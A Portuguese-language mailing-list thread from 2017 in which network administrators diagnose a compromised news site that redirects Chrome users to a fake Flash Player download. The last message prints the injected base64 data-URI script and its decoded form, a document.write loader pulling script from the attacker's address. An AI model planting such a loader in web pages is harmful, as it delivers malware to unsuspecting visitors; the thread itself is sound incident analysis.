[caiu] RES: Terra / Motorshow.com.br Infectado

Ednilson Aureliano ednilson em eddy.com.br
Qua Jun 14 12:55:31 BRT 2017


A pagina sofreu algum ataque e foi alterado o conteudo.



Adicionado o codigo: data:application_javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoIiUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCU2OCU3NCU3NCU3MCUzQSUyRiUyRiU1QiUzQSUzQSU2NiU2NiU2NiU2NiUzQSUzMyUzNCUzMCU2NiUzQSUzNiUzMSUzMiUzMiU1RCUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSIpKTs=



Que decodificado, é o redirecionamento:

document.write(unescape("<script src=http_::ffff:340f:6122]><_script>"));



O endereço em questão: ::ffff:340f:6122, é o ipv4 convertido.




---- On Qua, 14 jun 2017 11:19:18 -0300 Fábio Hernandes <fabio em hernandes.eti.br> wrote ----




Abre normal aqui pra mim, usando link vivo, navegador firefox e dns 

consultando root servers. 





-- 

Fábio R. Hernandes 

Fone: (17) 99643 6715 

Skype: hernandes.fabio 



Em 14 de junho de 2017 10:18, Marcos Carraro | Dalmobile < 

marcos.ti em dalmobile.com.br> escreveu: 



> Então o site deve estar violado, melhor que não foi o DNS. 

> 

> Obrigado pelos retornos! 

> 

> 

> 

> Marcos Carraro 

> 

> 

> 

> -----Mensagem original----- 

> De: caiu [mailto:caiu-bounces em eng.registro.br] Em nome de Marcelo Fiorini 

> Enviada em: quarta-feira, 14 de junho de 2017 10:10 

> Para: caiu em eng.registro.br 

> Assunto: Re: [caiu] Terra / Motorshow.com.br Infectado 

> 

> Estou no DNS da TIM 

> 

> 

> Em 14/06/2017 09:19, Leandro Carlos Rodrigues escreveu: 

> > Em 14/06/2017 09:16, Marcelo Fiorini escreveu: 

> >> Aqui ocorreu o mesmo que com o André 

> > 

> > Qual servidor DNS vocês dois estão usando? 

> > 

> >> 

> >> 

> >> 

> >> Em 14/06/2017 09:06, Andre Almeida escreveu: 

> >>> Aqui aconteceu o mesmo problema, primeiro informou algo sobre o flash. 

> >>> E logo após alterou a URL para http://[::ffff:340f:6122]/?A 

> >>> 

> >>> Att 

> >>> Andre Almeida 

> >>> 

> >>> Em 14 de junho de 2017 08:59, Lanio Nascimento < 

> >>> lanio.nascimento em coinvalores.com.br> escreveu: 

> >>> 

> >>>> Marcos, 

> >>>> Parece que seu navegador é que esta infectado. 

> >>>> 

> >>>> Aqui abriu normalmente. 

> >>>> Tente navegador - Depois DNS - Para depois ir para camada 3 

> >>>> 

> >>>> 

> >>>> *Lanio do Nascimento Amaral * 

> >>>> Departamento de TI 

> >>>> Coinvalores 

> >>>> Fone:11 3035-4147 

> >>>> Fone:11 3500-4147 

> >>>> 

> >>>> lanio.nascimento em coinvalores.com.br 

> >>>> www.coinvalores.com.br 

> >>>> Av. Brig. Faria Lima, 1461 - 10º Andar Torre Sul - CEP: 01452-921 - 

> >>>> São Paulo - SP 

> >>>> 

> >>>> P *Antes de imprimir, pense em sua responsabilidade e compromisso 

> >>>> com o meio ambiente*. 

> >>>> 

> >>>> *ALERTA -* As informações contidas nesta mensagem e nos arquivos 

> >>>> anexados são para uso restrito, sendo seu sigilo protegido por lei, 

> >>>> não havendo ainda garantia legal quanto à integridade de seu 

> >>>> conteúdo. Caso não seja o destinatário, por favor desconsidere essa 

> >>>> mensagem. O uso indevido dessas informações será tratado conforme 

> >>>> as normas da empresa e a legislação em vigor. 

> >>>> 

> >>>> *NOTICE -* The information in this e-mail and in the attached files 

> >>>> are confidential and may be legally privileged. There is no legal 

> >>>> guarantee as regards the reliability of said information. If you 

> >>>> are not the intended recipient please disregard the content 

> >>>> thereof. The unduly use of this information is subject to the rules 

> >>>> of the company and the legislation in force. 

> >>>> 

> >>>> Em 14 de junho de 2017 08:54, Marcos Carraro | Dalmobile < 

> >>>> marcos.ti em dalmobile.com.br> escreveu: 

> >>>> 

> >>>>> Bom Dia, 

> >>>>> 

> >>>>> Ao acessar a URL 

> >>>>> http://motorshow.com.br/3-cilindros-a-nova-era-dos-carros-1-0/ 

> >>>>> pelo google chrome, o mesmo redireciona para a seguinte url 

> >>>>> http:// [::ffff:340f:6122]/ forçando o download de um plugin Adobe 

> >>>>> Flash Player, porém o ocorrido só acontece com o Chrome. 

> >>>>> 

> >>>>> Fazendo alguns testes o endereço ::ffff:340f:6122 aponta para 

> >>>>> 52.15.97.34 

> >>>>> da 

> >>>>> amazona. 

> >>>>> 

> >>>>> Alguém mais identificou esta anomalia ? 

> >>>>> 

> >>>>> Obs:. Utilizando IPV4, IPV6 não esta ativo no provedor e nem na 

> >>>>> estação, tudo faz pensar que o provedor ou amazona está fazendo 

> >>>>> uma conversão de 

> >>>>> IPV6 

> >>>>> para IPV4 

> >>>>> 

> >>>>> 

> >>>>> Marcos Carraro 

> >>>>> 

> >>>>> 

> >>>>> _______________________________________________ 

> >>>>> caiu mailing list 

> >>>>> caiu em eng.registro.br 

> >>>>> https://eng.registro.br/mailman/listinfo/caiu 

> >>>>> 

> >>>>> 

> >>>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em: 

> >>>>> 

> >>>>> https://eng.registro.br/mailman/options/caiu 

> >>>>> 

> >>>> _______________________________________________ 

> >>>> caiu mailing list 

> >>>> caiu em eng.registro.br 

> >>>> https://eng.registro.br/mailman/listinfo/caiu 

> >>>> 

> >>>> 

> >>>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em: 

> >>>> 

> >>>> https://eng.registro.br/mailman/options/caiu 

> >>>> 

> >>> _______________________________________________ 

> >>> caiu mailing list 

> >>> caiu em eng.registro.br 

> >>> https://eng.registro.br/mailman/listinfo/caiu 

> >>> 

> >>> 

> >>> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em: 

> >>> 

> >>> https://eng.registro.br/mailman/options/caiu 

> >> 

> > 

> > _______________________________________________ 

> > caiu mailing list 

> > caiu em eng.registro.br 

> > https://eng.registro.br/mailman/listinfo/caiu 

> > 

> > 

> > --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em: 

> > 

> > https://eng.registro.br/mailman/options/caiu 

> 

> -- 

> _______________________________________________ 

> caiu mailing list 

> caiu em eng.registro.br 

> https://eng.registro.br/mailman/listinfo/caiu 

> 

> 

> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em: 

> 

> https://eng.registro.br/mailman/options/caiu 

> 

> _______________________________________________ 

> caiu mailing list 

> caiu em eng.registro.br 

> https://eng.registro.br/mailman/listinfo/caiu 

> 

> 

> --> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em: 

> 

> https://eng.registro.br/mailman/options/caiu 

> 

_______________________________________________ 

caiu mailing list 

caiu em eng.registro.br 

https://eng.registro.br/mailman/listinfo/caiu 





--> PARA SAIR DA LISTA SIGA AS INSTRUÇÕES em: 



https://eng.registro.br/mailman/options/caiu 








Mais detalhes sobre a lista de discussão caiu